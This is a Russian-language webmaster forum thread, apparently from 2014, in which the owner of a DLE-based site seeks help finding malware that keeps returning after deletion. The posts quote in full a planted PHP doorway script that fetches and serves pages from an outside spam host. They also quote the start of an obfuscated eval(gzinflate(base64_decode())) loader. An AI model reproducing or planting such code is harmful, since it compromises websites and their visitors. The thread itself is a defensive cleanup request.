Перезалили init.php из чистой системы, пару дней полет нормальный...
Пока нет, но ищем... и может знатоки что-то увидят в этом файле чтобы легче было искать :)
Спасибо, помогли с расшифровкой!!))
А вот что в этом самом файле page.php, в индес.пхп смотрел, вроде все чисто. Искал подобные операторы в разных файлах, ниче нигде нету) Может кто еще чтото подскажет? :)
<?php ?><?php
error_reporting(0);
$get = 'post'; // http://site.ru/?dor= dor
$charset = 'windows-1251';
if (isset($_GET[$get])) {
if (empty($_GET[$get])) $name = 'index.php';
else $name = $_GET[$get];
//================settings=======================//
$defaultType = "text/html; charset=$charset";
$fileType = array("css" => "text/css; charset=$charset", "png" => "image/png", "jpg" => "image/jpeg", "jpeg" => "image/jpeg", "gif" => "image/gif", "js" => "text/javascript", "xml" => "text/xml",);
$dor_host = 'http://rokpok.ru/files/' . str_replace('www.', '', $_SERVER[SERVER_NAME]);
//===============================================//$f1 = strrpos($name, "."); $f2 = substr($name, $f1 + 1, 999); $fileRas = strtolower($f2); $filename = $dor_host . '/' . $name; $file = file($filename); $type = array_key_exists($fileRas, $fileType) ? $fileType[$fileRas] : $defaultType; header("Content-Type: $type"); if ($file) { $html = implode('', $file); echo $html; exit; } elseif (extension_loaded('curl')) { $ch = curl_init(); $url_string = $dor_host . '/' . $name; curl_setopt($ch, CURLOPT_URL, $url_string); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $html = curl_exec($ch); curl_close($ch); if ($html) { echo $html; } else { header("Status: 404 Not Found"); echo 'PAGE NOT FOUND'; } exit; } else { header("Status: 404 Not Found"); echo 'PAGE NOT FOUND'; } exit;}?>
Смотрели, ничего подобного нету. Единстенный подозрительный файл это page.php, через который и происходит это все... может кто поможет его расшифровать?
Вот его первые строки:
<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZm5juTKFUR9Ae8fBoMxJOeBZG4kBvqTclibJVvozxdv5AkmpyQM9IxCV3HJvGtE3OwfX4/34/nt25///Pb99tWm47Pcvmo5Pu32Vd7jd9yrj+MzH5/Ury3r8TnuL8dzy.....
ищем, никак не можем найти! ) может кто подскажет где в ДЛЕ еще они могут прятаться? (uploads и templates проверили вроде норм) и большую часть на что ругался айболит тоже проверили, все чисто...
Те что были с page.php проверил, еще написало на многие php и js файлы: Скрипт использует код, который часто используются во вредоносных скриптах (но это тоже думаю нормальная история)
айболитом проверял, ругается на инит и ксскомпрессор:
Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт:
сайт..../public_html/engine/inc/include/init.php (зашифрованный, если кто подскажет как расшифровать буду благодарен, но думаю с ним все Ок)
Двойное расширение, зашифрованный контент или подозрение на вредоносный скрипт. Требуется дополнительный анализ:
сайт.../public_html/engine/classes/min/lib/Minify/YUI/CssCompressor.php (хз)---------- Добавлено 29.01.2014 в 04:29 ----------Перезалил init.php с чистого движка, попробуем... мож у кого-то есть еще какие-нибудь варианты? :)
Удаляю, но через день он снова появляется!!!))) (даже если сменить пароль на фтп)
Отправил на почту)
